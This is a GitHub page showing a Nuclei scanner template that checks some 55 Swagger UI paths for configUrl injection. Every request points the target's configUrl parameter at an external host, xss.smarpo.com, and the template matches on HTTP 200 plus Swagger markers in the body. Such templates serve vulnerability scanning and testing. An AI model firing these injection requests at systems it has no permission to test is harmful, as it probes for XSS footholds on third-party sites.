forked from coffinxp/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathSwagger.yaml
More file actions
85 lines (80 loc) · 5.11 KB
/
Swagger.yaml
File metadata and controls
85 lines (80 loc) · 5.11 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
id: swagger-ui-config-url-injection-Extensive
info:
name: Swagger UI Config URL Injection
author: Shadowbyte
severity: low
description: Detects if adding a configUrl parameter to Swagger UI endpoints leads to successful load (HTTP 200) and presence of Swagger UI content. Includes versioned paths.
tags: swagger-ui,xss,injection
requests:
- method: GET
path:
- '{{BaseURL}}/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger-ui?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/docs/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/idm/v2/api-docs?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/docs/api-reference?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swaggerui?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/help?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/doc?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api-reference?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger/docs/v1?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/reference?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api-docs/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/docs/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger-ui/api-docs?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/api-docs?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/apidocs?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger/static/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger-resources?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/__swagger__/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/_swagger_/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/spec?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/__swagger__/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/v2/doc?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/v1/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/v1/doc?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/_swagger_/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/classicapi/doc/?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/api/v1/openapi?configUrl=https://xss.smarpo.com/test.json'
# Versioned paths
- '{{BaseURL}}/v0.12/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.11/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.10/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.9/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.8/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.7/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.6/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.5/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.4/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.3/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.2/index.html?configUrl=https://xss.smarpo.com/test.json'
- '{{BaseURL}}/v0.1/index.html?configUrl=https://xss.smarpo.com/test.json'
redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- "swagger-ui" # Swagger UI specific identifier
- "swagger-initializer" # Swagger UI common script
- "api-docs" # Often present in API docs
- "swagger.json" # Common in Swagger UI
condition: or
- type: status
status:
- 200